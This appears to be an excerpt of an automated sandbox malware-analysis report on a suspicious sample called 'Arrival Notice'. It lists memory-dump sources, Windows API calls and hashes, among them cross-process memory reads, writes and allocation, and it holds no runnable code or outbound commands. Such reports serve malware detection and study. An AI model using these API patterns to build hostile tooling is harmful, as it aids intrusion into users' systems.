                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                              • String ID:
                                              • API String ID: 3824534824-0
                                              • Opcode ID: ad547d89eae25207a04efccd655237fd9ce7e9c950d469d607f034b90529d7b5
                                              • Instruction ID: ebbc1c9f8f23f714df34ac3e1be2bc99787feeb9700c553fc6eb2c5de2be0f22
                                              • Opcode Fuzzy Hash: ad547d89eae25207a04efccd655237fd9ce7e9c950d469d607f034b90529d7b5
                                              • Instruction Fuzzy Hash: B9110876918608BBC7019BBC9C04A9F7FACEB85321F144266F924D3290D6759D009BA1
                                              APIs
                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00928766
                                              • GetLastError.KERNEL32(?,0092822A,?,?,?), ref: 00928770
                                              • GetProcessHeap.KERNEL32(00000008,?,?,0092822A,?,?,?), ref: 0092877F
                                              • HeapAlloc.KERNEL32(00000000,?,0092822A,?,?,?), ref: 00928786
                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0092879D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 842720411-0
                                              • Opcode ID: c8f010614bf6b050622d2d470751e0c08dc9e0d8804498f319a339ee4cbb0eb5
                                              • Instruction ID: 0c856279265d5e97c7a724ac666efdd0993f001b4102fbe3014535700ba40b9b
                                              • Opcode Fuzzy Hash: c8f010614bf6b050622d2d470751e0c08dc9e0d8804498f319a339ee4cbb0eb5
                                              • Instruction Fuzzy Hash: 01014B71216618FFDB204FA6EC98D6B7BACEF893667200469F849C3260DA318C10DB60
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00935502
                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00935510
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00935518
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00935522
                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0093555E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                              • String ID:
                                              • API String ID: 2833360925-0
                                              • Opcode ID: 9f43b760cafdd61ec01b90425535c07740283fe0eb5f33ed82f72bd14e8cfa7f
                                              • Instruction ID: 95e65d9bbfb4b25fe31eb3872604ce5740f7a14b0983512fae9eab13da7ba96a
                                              • Opcode Fuzzy Hash: 9f43b760cafdd61ec01b90425535c07740283fe0eb5f33ed82f72bd14e8cfa7f
                                              • Instruction Fuzzy Hash: C9015E71C19A19DBCF00EFE5E8585EDBB78FB0D712F020456E401B2140DB305554DBA1
                                              APIs
                                              • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?,?,0092799D), ref: 0092766F
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 0092768A
                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 00927698
                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?), ref: 009276A8
                                              • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0092758C,80070057,?,?), ref: 009276B4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                              • String ID:
                                              • API String ID: 3897988419-0
                                              • Opcode ID: 14a9cf5059475a5e716343ee24b64ade103a9c8170b815f024db31cdb20dd00d
                                              • Instruction ID: fedccec81b449809786acff6c32221e1c22bbe22971f8f120d891d07f60ba332
                                              • Opcode Fuzzy Hash: 14a9cf5059475a5e716343ee24b64ade103a9c8170b815f024db31cdb20dd00d
                                              • Instruction Fuzzy Hash: 4C01A772615728BFDB105F99EC44BAABFADEF44762F140028FD05E2215E731DD4197A0
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00928608
                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00928612
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00928621
                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00928628
                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0092863E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: 5817edd58c4884742b4fa9d00378d1bce4198649da8773cbd95135f317c073b3
                                              • Instruction ID: e2127bf4cc6c6c0428a8b8acfaa1e5207c56c74c43c3eff09b043668406dc5b3
                                              • Opcode Fuzzy Hash: 5817edd58c4884742b4fa9d00378d1bce4198649da8773cbd95135f317c073b3
                                              • Instruction Fuzzy Hash: E1F06235216315AFEB200FA6EC9DE6B3BACEF89765B040425F945C7190CB719C45EB60
                                              APIs
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00928669
                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00928673
                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00928682
                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00928689
                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0092869F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                              • String ID:
                                              • API String ID: 44706859-0
                                              • Opcode ID: 98671c837ea9412634b5de6ebc08ff5c8f8a94b4e66df23c95ac799cc4dbac04
                                              • Instruction ID: 19559e1e1b9d30e0d8b075a75f4063339466edc0659579da4373ef3dac91b0bc
                                              • Opcode Fuzzy Hash: 98671c837ea9412634b5de6ebc08ff5c8f8a94b4e66df23c95ac799cc4dbac04
                                              • Instruction Fuzzy Hash: D3F0AF70216314BFEB111FA6EC98E6B3BADEF89766B140025F905C2190CA709800EB60
                                              APIs
                                              • GetDlgItem.USER32(?,000003E9), ref: 0092C6BA
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 0092C6D1
                                              • MessageBeep.USER32(00000000), ref: 0092C6E9
                                              • KillTimer.USER32(?,0000040A), ref: 0092C705
                                              • EndDialog.USER32(?,00000001), ref: 0092C71F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                              • String ID:
                                              • API String ID: 3741023627-0
                                              • Opcode ID: a9de9b18f5f0763fe28fd16b5953eb0b757a17b30e102c4d33bdb12a6b13cd49
                                              • Instruction ID: 6209bc716fb74fef9d34b75ad8e35312451d0b99d7fde3917401de36871c4268
                                              • Opcode Fuzzy Hash: a9de9b18f5f0763fe28fd16b5953eb0b757a17b30e102c4d33bdb12a6b13cd49
                                              • Instruction Fuzzy Hash: 6F01D670415718ABEB206B21EC6EF9A77BCFF00702F000669F542A10E0EBF4A9549F81
                                              APIs
                                              • EndPath.GDI32(?), ref: 008D13BF
                                              • StrokeAndFillPath.GDI32(?,?,0090BAD8,00000000,?), ref: 008D13DB
                                              • SelectObject.GDI32(?,00000000), ref: 008D13EE
                                              • DeleteObject.GDI32 ref: 008D1401
                                              • StrokePath.GDI32(?), ref: 008D141C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                              • String ID:
                                              • API String ID: 2625713937-0
                                              • Opcode ID: 90f70813f158ef4969b174e3a726d34c04780daa5e2422ce393263d09fb2a2e7
                                              • Instruction ID: f4383737da5a959f786a61ed16d086150cb73bf84ff2831bae0fde9de216f0ed
                                              • Opcode Fuzzy Hash: 90f70813f158ef4969b174e3a726d34c04780daa5e2422ce393263d09fb2a2e7
                                              • Instruction Fuzzy Hash: C3F0B230028708ABDB155F2BEC0C7587FA6FB01326F088326E429856F1C7358995EF54
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0093C69D
                                              • CoCreateInstance.OLE32(00962D6C,00000000,00000001,00962BDC,?), ref: 0093C6B5
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                              • CoUninitialize.OLE32 ref: 0093C922
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CreateInitializeInstanceUninitialize_memmove
                                              • String ID: .lnk
                                              • API String ID: 2683427295-24824748
                                              • Opcode ID: c183869bf01e628d53fddb1bb3dea66ff7dbebbc53e7adbfbb688c81145e4de8
                                              • Instruction ID: 79cb01a6314df2ef4113d0bc52e0dde0c2c1b7682f931b0787a213b35e054db3
                                              • Opcode Fuzzy Hash: c183869bf01e628d53fddb1bb3dea66ff7dbebbc53e7adbfbb688c81145e4de8
                                              • Instruction Fuzzy Hash: EAA12C71108215AFD700EF58C891EABB7E8FF94714F004A5DF196D7292EB70EA49CB52
                                              APIs
                                                • Part of subcall function 008F0FF6: std::exception::exception.LIBCMT ref: 008F102C
                                                • Part of subcall function 008F0FF6: __CxxThrowException@8.LIBCMT ref: 008F1041
                                                • Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82
                                                • Part of subcall function 008D7BB1: _memmove.LIBCMT ref: 008D7C0B
                                              • __swprintf.LIBCMT ref: 008E302D
                                              Strings
                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 008E2EC6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                              • API String ID: 1943609520-557222456
                                              • Opcode ID: 0c848371b11e6b099face223bab7fb04aaf1653a0ee2ebbf29fd2017261f2efe
                                              • Instruction ID: e444406973f21fd42a5bc7823f2fe5c1457321e3b3f5d9a45097c229f4cec1ff
                                              • Opcode Fuzzy Hash: 0c848371b11e6b099face223bab7fb04aaf1653a0ee2ebbf29fd2017261f2efe
                                              • Instruction Fuzzy Hash: 24917D71508745AFC728EF28D985C6EB7A8FF86750F00491EF581D73A1EA20EE45CB52
                                              APIs
                                                • Part of subcall function 008D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008D48A1,?,?,008D37C0,?), ref: 008D48CE
                                              • CoInitialize.OLE32(00000000), ref: 0093BC26
                                              • CoCreateInstance.OLE32(00962D6C,00000000,00000001,00962BDC,?), ref: 0093BC3F
                                              • CoUninitialize.OLE32 ref: 0093BC5C
                                                • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                              • String ID: .lnk
                                              • API String ID: 2126378814-24824748
                                              • Opcode ID: 7a3c03c359676ff25b0f61f75224edc231ff7d9314a53d80b714816a0bfff6b9
                                              • Instruction ID: 41117454846bbb18e5527c140555caac12c3e834306682a75f90d078901df7be
                                              • Opcode Fuzzy Hash: 7a3c03c359676ff25b0f61f75224edc231ff7d9314a53d80b714816a0bfff6b9
                                              • Instruction Fuzzy Hash: BFA13575204311AFCB10DF18C494E5ABBE5FF88314F148A99F99A9B3A1CB31ED45CB92
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 008F52DD
                                                • Part of subcall function 00900340: __87except.LIBCMT ref: 0090037B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ErrorHandling__87except__start
                                              • String ID: pow
                                              • API String ID: 2905807303-2276729525
                                              • Opcode ID: f309da572b73b6ac79f201d41379313cdda6c2d191489e32d82c25b5d7fdd56d
                                              • Instruction ID: cd25ca473e2b7983e9e9fd4447f9e398b53b2a29a8ae4be0f861c58709b38fc9
                                              • Opcode Fuzzy Hash: f309da572b73b6ac79f201d41379313cdda6c2d191489e32d82c25b5d7fdd56d
                                              • Instruction Fuzzy Hash: A7516B21A1CA098BCB117738C95137E7B94FB81754F204E59E3D5C23E9EE788CD4AA4A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #$+
                                              • API String ID: 0-2552117581
                                              • Opcode ID: 42854e42d7c37e1214e4e582f3c47e5d644a3a8220471d5bad310f10df51263b
                                              • Instruction ID: 3c484206fdc5efc77a020d57f8248aabcb142ba28fafd73fa35123af30586ff0
                                              • Opcode Fuzzy Hash: 42854e42d7c37e1214e4e582f3c47e5d644a3a8220471d5bad310f10df51263b
                                              • Instruction Fuzzy Hash: AB51317510426ACFCF259F28E8886FA7BA8FF15310F184056E8919B3E5D7349C42CB61
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _memset$_memmove
                                              • String ID: ERCP
                                              • API String ID: 2532777613-1384759551
                                              • Opcode ID: 5c5fb3e91bd97406be946d1fb2e31b5a907c0740f443c1d44fd1164a0928c5b8
                                              • Instruction ID: 415b10acdff143a84746cf73f96ee342bda53662045e39944b6076ceaa22d3fe
                                              • Opcode Fuzzy Hash: 5c5fb3e91bd97406be946d1fb2e31b5a907c0740f443c1d44fd1164a0928c5b8
                                              • Instruction Fuzzy Hash: B451B171900759DBCB24CF65C8817AABBF4FF14358F20856EE94ACB281F771A5A0CB45
                                              APIs
                                                • Part of subcall function 009319CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00929778,?,?,00000034,00000800,?,00000034), ref: 009319F6
                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00929D21
                                                • Part of subcall function 00931997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009297A7,?,?,00000800,?,00001073,00000000,?,?), ref: 009319C1
                                                • Part of subcall function 009318EE: GetWindowThreadProcessId.USER32(?,?), ref: 00931919
                                                • Part of subcall function 009318EE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0092973C,00000034,?,?,00001004,00000000,00000000), ref: 00931929
                                                • Part of subcall function 009318EE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0092973C,00000034,?,?,00001004,00000000,00000000), ref: 0093193F
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00929D8E
                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00929DDB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                              • String ID: @
                                              • API String ID: 4150878124-2766056989
                                              • Opcode ID: 3ecd2729d885b65e27b90123a0d4b7f9a6b92bbbc528711d9d9cee8881a7db81
                                              • Instruction ID: 8930df3d749d2f737c6a32e4e08539f21823a82b0685bf631ae28c1ccbeca63d
                                              • Opcode Fuzzy Hash: 3ecd2729d885b65e27b90123a0d4b7f9a6b92bbbc528711d9d9cee8881a7db81
                                              • Instruction Fuzzy Hash: D3415976901218AFCB10DBA4DC91BEEBBB8EF49700F004095FA45B7191DA706E84DFA1
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0095F910,00000000,?,?,?,?), ref: 00957C4E
                                              • GetWindowLongW.USER32 ref: 00957C6B
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00957C7B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$Long
                                              • String ID: SysTreeView32
                                              • API String ID: 847901565-1698111956
                                              • Opcode ID: 5d6204ead54346e0c6d63bdf7a492d1f1b33d6f029cb0f6d538edda44d1dab61
                                              • Instruction ID: 20165358eec5a9520996a2c105f03a8bce3ebb552ff23e9654ea085448b7d3ad
                                              • Opcode Fuzzy Hash: 5d6204ead54346e0c6d63bdf7a492d1f1b33d6f029cb0f6d538edda44d1dab61
                                              • Instruction Fuzzy Hash: 1531ED31204206AADB118F79DC05BEAB7A9EF44335F244725FCB5D32E0C730E9549B50
                                              APIs
                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009576D0
                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009576E4
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00957708
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
